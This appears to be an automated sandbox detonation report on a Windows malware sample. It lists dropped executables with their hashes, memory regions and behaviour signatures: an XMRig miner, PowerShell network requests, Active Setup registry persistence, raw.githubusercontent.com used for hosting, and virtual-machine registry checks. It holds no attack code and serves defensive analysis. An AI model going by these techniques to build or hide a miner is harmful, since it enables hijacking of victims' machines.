| SHA1 | c01ee4fa1fcf5aa74d6ae5effb7b2e236751fbae |
| SHA256 | c9f2b2d858d6387aa387a46352835d6b7e3f16059989d101fd0229fba57e676f |
| SHA512 | f379f5cf8a42c33f595d516e3590a79ba5e1eac6cc9e5cd10c84ad91a6e8de60541fda600437ca297600c4cd0ffe0f85735d43c39dea228650a05415ac8310a3 |
C:\Windows\system\QxTuONe.exe
| MD5 | bcb3f3f1caf0bb0211b3be97d72d1600 |
| SHA1 | 9185715b109c7670a760d98b29b7f1f770d6e150 |
| SHA256 | 13767cadd84c6bf3716bf4255e9a923f9551fc8d87b215ebdfc7e9c8e5383ef6 |
| SHA512 | c5aa4834c325e0633e86446b5eab57f1cd83753e083de38a29a8a05463f6ea8734856ab1a75ce2e9838694ea360124c99d18d538254b5d593a564af5b4442376 |
C:\Windows\system\zUvvoeA.exe
| MD5 | 026921e2455743d46925b02dfc9d5f56 |
| SHA1 | e491ff3434a9989cf92ff28dfff2386f02078e2b |
| SHA256 | 3698158a48ee64e11a7f843473c14d515f8204a82f3547d51969146aae14c78c |
| SHA512 | 05679e17c057823281aeb1727f4dca8bfa82f7aec903993629034d9d4878c071084f592f6f990de2c11d00928827d50f97d50f7a699d9a62a584ad294d1d640c |
\Windows\system\gOGoVKq.exe
| MD5 | f4b58377ba39350ca3798e1449ff3d53 |
| SHA1 | f8685d6564196f843656aa2757d0c5dc7d14410c |
| SHA256 | b2cf538fb232434b1255d351d4fa42eae610382403a77442b27b9a816b7b4d67 |
| SHA512 | 6edc823beac7f80162f2509c900467051a1170dd746e586868e030abe2359f7d980aef95b223e1e7ee90a37a86e76c4c69a3560dae9ae1aa3f4a59e0c9a39747 |
\Windows\system\vxDaIRD.exe
| MD5 | 48c77594fed920db3958aca4b5843fff |
| SHA1 | 080172751d937a85c88ad8c4635189a2c60caa54 |
| SHA256 | a58e40a0c31053f7a457f688bb56adf030b88fbd0027874ca27f6eea978a890c |
| SHA512 | 3d783e19d1a4a45bb9a112c17a180634624404d16700463ecc581787e9c4bb80aa94b47b846a79a491951c6d9e362a6ac3020562455f1332829d21e42e891913 |
\Windows\system\EAyhzNZ.exe
| MD5 | ce0add48c5f49e80fe1884bf07df9835 |
| SHA1 | 2cf241672293a12a183900e3839ed0f920662074 |
| SHA256 | 8f2aecb89394fa81fc45a23c33cc2ff3266c812bfdf3f96f99db4cb638e7cf6c |
| SHA512 | 6d1ae8f78df89ed23cabbced426c44ca188bda6d8b1a8f37d4f5e09059832c85556b487adc82865fefc0b86c4f3306ba33d8dc40cd1af0f3e8af5563199944a0 |
\Windows\system\gZeYscW.exe
| MD5 | c07f78eeef0a3d09c09952a2fe9d5b2c |
| SHA1 | e675100065d583ac16d3fcdec11983ddfb03dc71 |
| SHA256 | 7a4a29c8716ef54fdc638f8f8ae17fe2a79c1b00b2655d93599c42db914b1f64 |
| SHA512 | 24b0a2a601a8617ae7e18072086e9feb286b69a848e0300eb307827ea897ee9573bae8a600a94a012931218eb10ae1b49db667e343fd83e8ed6a873dc2da02ae |
C:\Windows\system\huLwSvy.exe
| MD5 | 7d9f709080a993d48e955d8e0f7bb1b3 |
| SHA1 | 8cdee4302865b1b87eec16a31955700477c7e272 |
| SHA256 | fb55dff4a439aaf18607c3c9e1fec4238ba4504f0ee3e777f609e1bb3b542072 |
| SHA512 | 1549eb71cce0e28845405bb873ba7be997c9650ae544b98b619c252c76c4c5161651b33fbaef07bbd3a90ba44115cd58417f27be98d371c06baef0330b525e91 |
\Windows\system\DSQRGyF.exe
| MD5 | 226879e1f42af2581a8fe3a7e0333069 |
| SHA1 | 71881086f5d1c1a09c62f488ecd7dbc8cbeb9a86 |
| SHA256 | 4b4d2d75b5db11a68ae5b78ea055f66b53d079d5aceb59d172ac49fbd02cc4bd |
| SHA512 | 1b750603485398d2e37a0d178ded3291e2510d4e145d21aaa1854485a4fa001c71f1cb9f631d727181c42bc662bdd2b9c5577c587eb0e1ff31d70091ccc39ae8 |
memory/2516-256-0x000000001B1A0000-0x000000001B482000-memory.dmp
C:\Windows\system\fDqIhKf.exe
| MD5 | 3deaee3e27b06f1e1e26e169bcbdfb86 |
| SHA1 | 8b9d3157d8797d40309d8af53e8da220188f0dae |
| SHA256 | c2b063067be20ab7d6e9fa8ea1f70152f28e182cb2eb3b3e5a50a8561a3867cb |
| SHA512 | 0a0f7f58e4a6ef3cffab85788969f2e4f4c9f3445495dbb47b61b5674f182c5871c721cec3496ed54b655d16255eafced5c9bddbe9ed490b27dc964713728ef0 |
C:\Windows\system\eapzPoI.exe
| MD5 | 38b32246f17333690957f3a7e8f8e0ed |
| SHA1 | 782308fced2ee85faff930fdf44b61a903449d5a |
| SHA256 | 380a16078007fbda6bbd8ada48ddf88094defa394200a0551037fa1e665207b6 |
| SHA512 | 548bf92590f49f1644e9e31cc121f319e90ed5aed4037e370c8a5497aa973cdede12f15468be34c04b4f3145129caed051f26d4ecef01a2b09a3f412766c98c8 |
C:\Windows\system\VkZxAir.exe
| MD5 | 7bc72562d6cda0ea53b98c0d21e2a7aa |
| SHA1 | 4cc7134ce693595c6db0806bfd5c12af5ab15ec9 |
| SHA256 | f7292a3a27cff4a1ebb649b9df51f2202efc8771d860f11ac64a0730a9cd028a |
| SHA512 | 8017fa90f29b2e743aef8e53bda3df220b19f3f97aef835bb99d62b7fa52fd48dd46add3dc2a21d98ac5290fbb87df52bb4156e86aeaf34628ba9c422513c989 |
\Windows\system\bhhBwUp.exe
| MD5 | 279a6430dcf40266f159993ed2986a6f |
| SHA1 | 0371d497a95fb57ef21cbd7d38852508ea6634d5 |
| SHA256 | 7f9167301b81ca380e0109ea87995021544ed026270fdfa9eba2b29738a6853a |
| SHA512 | 2df417cad072c1d9757465123acf035616f2a20a64da3c009992e82e04752c7eb2611a4b6148bc0124ee5cbc0c45eb3a817e566c8370567efdfe0e8e691af7de |
\Windows\system\OVBuDUw.exe
| MD5 | 1e47558b640bbaca54837a6b1326d288 |
| SHA1 | 7501ba1962b8cd8d27f41c18f74bddd711eaee7c |
| SHA256 | 9172403c0d6a052dd5eee215b5c39c6f441afd294dcc68560ee67b01ab20efa1 |
| SHA512 | 0d2036eccfe8d3ed366f4b535ae88ed73c59c0748f070855a983f3cc3970718859f3751d1b4a642954a997a74abb1732d3c17f0b462070bf8ee3b2ae766608ad |
C:\Windows\system\tpzSBcw.exe
| MD5 | 40726f27e4f35df4d61efd32fd41f05c |
| SHA1 | 4c334b69456e01a1f3173c72b9fac386dff08d58 |
| SHA256 | fbb2ebd74051874ddd904a3b4065f68deedffeeb2b761b680230bdf1fa597c62 |
| SHA512 | 068e9b1d10fae357527d3cb6203f5fd903502c1c916f59cae37d36b2be79c4175703b383e28d1d82a492cdea8150afb59bf9e43a48947405ae4d1e785ecb6482 |
C:\Windows\system\kWikGnv.exe
| MD5 | 8a5138d86cd33c38118c3450eb5fa1da |
| SHA1 | c44a246730fb04d5a0ac6b9c7ae19d3d1cf9a031 |
| SHA256 | ab5353141a9aeeb6cae16e00a07e3de29a005f983261f4594b04f569fc81e0c5 |
| SHA512 | 0f5c3cef53ac7a3d278c3ff042aa10807dfc724e758ce04d1fe16f19201454d6da678dcddad91fafaafea4b75b21cb1fbaad155dd771a1ea1f7934c8f5fcc594 |
C:\Windows\system\LhDDZfl.exe
| MD5 | 6fa1de198a13a3d8e15a05e87f50ebda |
| SHA1 | cf8a9af5b4d8d090fc07959b70a57299d8745c30 |
| SHA256 | 64162b22e15c082172493184f19eea7e48069ee2d5455b22a0baa964046c67db |
| SHA512 | 7f3e412e63d942fe75f43e6bd5e92ffbe3ea5c08808b6b14be8df95a4e867842cfd7b49c9cf94f94a1e82f26ed4e0df13dd6a5ee365f268e96d10500052ba8e5 |
\Windows\system\vbLpHXy.exe
| MD5 | b7ff51caa800f54676f27bb2cc789556 |
| SHA1 | 512abb3e154b01995fef1d2e2ff9685b0b9a5906 |
| SHA256 | eed2c93b27a9091222bf86538c5e1c06e90069dfb5ba6d8be480979f84990b4c |
| SHA512 | e03a57456c9cbde9d01db20bf610d904eece5b303f678e9d5f45872d9e5afb62e854ea4ef1058cff3747f30b1a9d09e4f7990ecd616c957a95bf1704a4404178 |
C:\Windows\system\HGqhCUN.exe
| MD5 | 16c89bc204e1cc8183e8fa43e35be0d5 |
| SHA1 | 917fe383adbcaaae9f436c28f018f58363e43f45 |
| SHA256 | 4e2dccb0e720d600c46a4efea4096b57774712efa97caadf9d6bf10c988ba184 |
| SHA512 | 72f466438905560ca574765073e0a5604e0e84fbd0a75cb75f93ae6be5e9122a49e9ff4c200694d3a0f35fb8ee544d9769116e889c3e12f719b53280cf52790c |
memory/364-101-0x000000013F6A0000-0x000000013FA92000-memory.dmp
memory/1876-100-0x0000000002B20000-0x0000000002F12000-memory.dmp
C:\Windows\system\gqnWWLb.exe
| MD5 | 21bfe33f53a1910771560c5cae7304a7 |
| SHA1 | 2b70e5d1e46076b716fe9b74dae41d0c6cc9fa96 |
| SHA256 | a41f18d546d589b3c7a4581c2b2813ddd622be21b8e21e2e6f80962878bb0d6e |
| SHA512 | d666f52356abdaf6968169e6c116e05a7b8e32e96f560c497af0f22355a75aafed6b5d6e36d2f648b5966153b8673bc93bb701f2d2e36fbc3b55d9f23da4a52b |
C:\Windows\system\ajQqAFC.exe
| MD5 | 9d0cadec3d94a4e81d76a26ac8744f9b |
| SHA1 | 8f2a44f2d81923dea27008fd5f42973a29b148e9 |
| SHA256 | f8777ef2663697b24df8720a577715864f3ed976cc353269efa5fa84a521065d |
| SHA512 | 8ce5f292d2001b5cd07a5022bb906364b2e03ae6ee94556522963e0b3fe5d7ab488f9daadd1d34444dae51b1e852604afb0efaf50317a74bae62f44ec2e4c2eb |
memory/2516-257-0x0000000002310000-0x0000000002318000-memory.dmp
memory/1876-258-0x000000013F730000-0x000000013FB22000-memory.dmp
memory/2624-320-0x000000013F930000-0x000000013FD22000-memory.dmp
memory/2488-570-0x000000013F2F0000-0x000000013F6E2000-memory.dmp
memory/1876-65-0x0000000002B20000-0x0000000002F12000-memory.dmp
memory/2952-64-0x000000013F850000-0x000000013FC42000-memory.dmp
memory/2676-47-0x000000013F210000-0x000000013F602000-memory.dmp
memory/1876-36-0x0000000002B20000-0x0000000002F12000-memory.dmp
memory/2624-32-0x000000013F930000-0x000000013FD22000-memory.dmp
C:\Windows\system\AzgLJdf.exe
| MD5 | f8e3b9ac25c3f8bc09b401bd101f8aae |
| SHA1 | 26827e5340dbe9b63dbec9850f4eaba4a58a671b |
| SHA256 | 4a4b36e5157c589e83ebfb4104087a186d32ebd8390da52780520345cd8ce955 |
| SHA512 | 5978641656d59b0b7a0d811c26914b3e8aa2b614bc6a4387bc303811c115476d1b92643bf4e98e7ceccdcd61d285127e92512161e9f71d676cae8e68fa8193e8 |
C:\Windows\system\PteAUmB.exe
| MD5 | 1a929067a6f987a174a1a37129099fba |
| SHA1 | 4eb12bf07566091e8f2495de3c02b0b025332c7f |
| SHA256 | 97bb1b5bc8728a5d9daca1675dbc211eae2acd0b3ab98bca7d0117c4313ac84f |
| SHA512 | e9948d13279c20f525a345abd8e9baa5eb14da4bdc4399a9c1c95f03135cce945c12f2b513f424516cce53f1ef0e017e231b1bc48a9a9d541c32168a9a3bef62 |
C:\Windows\system\jeJxGuR.exe
| MD5 | 8d4cc0f26d543e160a8f0b8f8cbb4621 |
| SHA1 | 3d2c39b01d514d0aefe7b78330e7c8a4c72116db |
| SHA256 | e4fca17b6f830c5ebf2584f2c812f5f70e8cd430e7f3360e7c980d1b64b2472e |
| SHA512 | 7b10c2249faf17b30b4d43ecc8f4bc0f3d44741e240c6ac1d505d1cf2c5cc330594fa786cb6325a87dcd6840c50cc8906bc68466533e141d5d242278c27e1ccc |
C:\Windows\system\mvUjhXw.exe
| MD5 | 4565ada39c8788d6c9d66ffd129d9cfc |
| SHA1 | a7fe260f9fc630e578c49f2f9f56f7ac912f7aa1 |
| SHA256 | 238939da9ea07e7abe66fcda75fca5dd1f9610a67cef21145bafde823694ee28 |
| SHA512 | e70df416bb35bcfac8a9a4cc6739bd092ae0c457d1bf7c5e6ca7410afae40618ce9e8dca874a7f23a46b27b5a11f3770c858a051a23c5d05cdd194d4170bc307 |
C:\Windows\system\hatibAo.exe
| MD5 | 6e30307d392e23dcf768c426e9b55ce6 |
| SHA1 | 5ef77118916013428f6e6ce4bcada254d6c424b5 |
| SHA256 | 63bd219fe5e53b39c65a6c40489e9863f54c934616238c1cacb34bb4b7bd2df6 |
| SHA512 | b6c0aaf78e7378d2910956c67107d10822283940c75e80c2743a1bdc32bd44cc648c5a6bdfba455354259f3fbed55dc08e3b80a3aeb446b0f61770c474327728 |
memory/1876-95-0x0000000002B20000-0x0000000002F12000-memory.dmp
memory/1876-87-0x0000000002B20000-0x0000000002F12000-memory.dmp
memory/2736-79-0x000000013F6F0000-0x000000013FAE2000-memory.dmp
memory/1876-72-0x0000000002B20000-0x0000000002F12000-memory.dmp
C:\Windows\system\mNSYFdf.exe
| MD5 | 709595c952b6ca981e1749e18f04c2af |
| SHA1 | 4eeb4a3263c12d8de21f50db2c863e3cbfad168c |
| SHA256 | 1048295b1561d6e07f4805c709878b422fb00d8a0b2fda065e6668f390422b38 |
| SHA512 | 81073d22af207b5282015ae8c404681bdbb63763560d48d30b3ebf6c067d7cbc304a19d25e37b68367711392c1ec0b82671b2e272ac5955f5a1c87a98f5cd026 |
memory/1876-57-0x0000000002B20000-0x0000000002F12000-memory.dmp
memory/1876-54-0x000000013F050000-0x000000013F442000-memory.dmp
memory/2488-52-0x000000013F2F0000-0x000000013F6E2000-memory.dmp
memory/2516-50-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/1876-41-0x000000013F210000-0x000000013F602000-memory.dmp
C:\Windows\system\NciBgBh.exe
| MD5 | 7bb24258905df96b228b1ce22ab34236 |
| SHA1 | 59f6824ba9f84b31f32c42ec7440962f3cdf55b4 |
| SHA256 | 578ac94e5881872fde7835e700e1cab56f1bd9a4b2764f62267969771c9ce162 |
| SHA512 | d4c8f01241574f15d6a3416fe06f0945ba310944503929ec2ae2d1c1cae40dcff20a3169d35bc61c29395130228a42d93e19472975015c0cfdd238832d7f7cd5 |
memory/1876-13-0x0000000002B20000-0x0000000002F12000-memory.dmp
C:\Windows\system\ihHqYSi.exe
| MD5 | 7fc2355fd28a52b188bb0d36ecde1ec7 |
| SHA1 | 0a7cbb507840c0603588c68cc92e81fe9629825a |
| SHA256 | 9f3129cb91223cbdb4883146c4655c80eca9d839ee1e420c184d5955832584f2 |
| SHA512 | 21fe6412897eaf0cd44b1dc2c9f899d49788afb5bdc5f5ae7da8fd797d5ff5d553663aead1c870557639f2551a92119ade407f9590548ad00eadcf21ba7e6d00 |
memory/2512-3306-0x000000013F570000-0x000000013F962000-memory.dmp
memory/364-4142-0x000000013F6A0000-0x000000013FA92000-memory.dmp
memory/2736-4150-0x000000013F6F0000-0x000000013FAE2000-memory.dmp
memory/2488-4928-0x000000013F2F0000-0x000000013F6E2000-memory.dmp
memory/2868-5017-0x000000013F050000-0x000000013F442000-memory.dmp
memory/2884-5043-0x000000013FF10000-0x0000000140302000-memory.dmp
memory/2676-5067-0x000000013F210000-0x000000013F602000-memory.dmp
memory/2624-5102-0x000000013F930000-0x000000013FD22000-memory.dmp
C:\Windows\system\IrVkeqd.exe
| MD5 | 67d893d1a2095d39d451d08ee1cc05e9 |
| SHA1 | dad7ef4487e41ff3c3e600250e691ed16832dc94 |
| SHA256 | cc871666e89dd430f5e3dc9cc361cd1a4ecf7214b4b8daeb86cca2257079f3ce |
| SHA512 | 7799e4db272ac6c136cb55f2e50c1582a5027767dc6d148dbf159fdb6f776a047cf2ac573fbb2f2ca5a994173cf0465c93ef3f6e6c86e8981136e854def9801d |
memory/2952-6516-0x000000013F850000-0x000000013FC42000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 13:41
Reported
2024-06-13 13:43
Platform
win10v2004-20240611-en
Max time kernel
75s
Max time network
151s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Windows directory
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
